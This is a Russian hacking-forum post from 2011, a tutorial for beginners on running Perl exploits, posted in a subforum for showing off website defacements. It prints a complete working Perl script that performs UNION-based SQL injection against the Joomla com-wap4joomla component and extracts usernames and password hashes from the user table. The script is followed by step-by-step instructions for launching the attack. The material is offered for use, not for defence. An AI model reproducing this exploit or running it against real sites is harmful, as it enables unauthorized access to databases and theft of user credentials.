Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Трафик, загрузки > Дефейсы
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Дефейсы Взломал? Покажи всем!

Ответ
 
Опции темы
Старый 09.02.2011, 23:19   #1
-=Bob=-
newbie 
 
Аватар для -=Bob=-
 
Регистрация: 05.02.2011
Сообщений: 17
Вес репутации: 1 -=Bob=- новичек
Депозит: 0$
Вы сказали Спасибо: 15
Поблагодарили 15 раз(а) в 6 сообщениях
Здраствуйте уважаемые форумчане с вами я -=Bob=-. В сегодняшней статье я хочу вам рассказать про применение перловых эксплойтов.

I. Стадия первая. Начало.

Давай те сначала разберёмся что такое эксплойт.
Эксплойт - (англ. exploit, эксплуатировать) — это компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DoS-атака).
©Википедия.

Язык Perl - высокоуровневый интерпретируемый динамический язык программирования общего назначения, созданный Ларри Уоллом, лингвистом по образованию. Название языка представляет собой аббревиатуру, которая расшифровывается как Practical Extraction and Report Language «практический язык для извлечения данных и составления отчётов»[3]. Первоначально аббревиатура состояла из пяти символов и в таком виде в точности совпадала с английским словом pearl, жемчужина. Но затем стало известно, что такой язык существует (см. PEARL) и букву «а» убрали. Талисманом языка Perl является верблюд — не слишком красивое, но очень выносливое животное, способное выполнять тяжёлую работу.
©Википедия.


II. Стадия вторая. Практика.

Чтобы применить перловые эксплойты на понадобится:
  1. Блокнот notepad. Качаем тут.
  2. Код эксплойта. Найти его можно тут.
  3. Интепретатор Perl. Я использую ActivePerl. Качаем тут.

Код эксплойта должен начинаться вот так:
Код:
#!/usr/bin/perl
Пример производится на уязвимости joomla com-wap4joomla

А вот и сам код нашего эксплойта полностью:
Код:
#!/usr/bin/perl -w
print
"\t\t
 ################################################################
 ############ This exploit created by ImpLex ICQ: 444-979 #######
 ############             from WHACK.RU                   #######
 ############               WHACK.RU                      #######
 ############ wapmain.php remote sql injection exploit    #######
 ############              LETS GO!!!!                    #######
 ################################################################\n\n";
# joomla com-wap4joomla
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
        chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
        chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
        chomp(my $table1=<STDIN>);


print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
                print "\n[+] User;password : $1";
                print "\n[+] password = md5(md5:salt) or md5";
                print "\n[+] target has been hacked";
                print "\n[+] If password-md5(md5:salt) => Then user - admin";
                print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
©ImpLex

Начинаем атаку:
  1. Итак устанавливаем Perl
  2. Копируем код эксплойта и сохраняем как *.pl
  3. Получившейся файл закидываем в корень диска С:\
  4. Запускаем команжную строку. Путь к ней: пуск->выполнить->cmd
  5. В камандной строке запускаем интерпретатор Perl. Командой: perl\bin\perl.exe. Далее пишем название нашего эксплойта
  6. И напоследок вбиваем команды для нашего эксплойта
  7. Нажимаем: Enter
  8. И мы видим что наша атака успешно пошла.
Удачных вам применений эксплойтов. Статья думаю будет понятна даже новичкам и школьникам.

Автор: -=Bob=-
-=Bob=- вне форума   Ответить с цитированием
Благодарности: 3
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 10:21.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru